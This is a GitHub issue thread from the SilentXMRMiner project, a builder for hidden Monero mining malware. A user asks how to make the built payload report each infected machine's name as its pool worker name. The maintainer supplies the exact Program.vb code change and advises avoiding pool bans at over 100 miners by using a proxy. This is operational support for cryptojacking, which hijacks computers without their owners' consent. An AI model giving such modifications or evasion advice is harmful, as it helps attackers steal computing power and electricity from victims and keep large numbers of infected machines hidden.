### ISSUE TITLE
Change pass as soon as payload is started

### ISSUE THREAD

**Issue by shizdev** [UnamSanctam/SilentXMRMiner#19]
Is there a way to change the password as soon as the final built payload is executed? this would be useful for SupportXMR. I'd like to change the pass to the machine name. the method to get the machine name would be System.Environment.MachineName. I am not very experienced in VB so if you could help or atleast guide me in the general direction it would be helpful 👍

**Comment by UnamSanctam** [comment]
In Resources\Program.vb on line 173 you can change `pass=#PWD` to `pass="+RegularExpressions.Regex.Replace(Environment.MachineName.ToString(), "[^a-zA-Z0-9]", "")+"` and it should probably work. I added the regex since I think they only support alphanumeric characters as Worker names.

Though, a word of caution: I believe they may ban you if you have over 100 miners (and don't use xmrig-proxy or something similar).

**Comment by shizdev** [comment]
> In Resources\Program.vb on line 173 you can change `pass=#PWD` to `pass="+RegularExpressions.Regex.Replace(Environment.MachineName.ToString(), "[^a-zA-Z0-9]", "")+"` and it should probably work. I added the regex since I think they only support alphanumeric characters as Worker names.
> 
> Though, a word of caution: I believe they may ban you if you have over 100 miners (and don't use xmrig-proxy or something similar).

Ok thank you really much
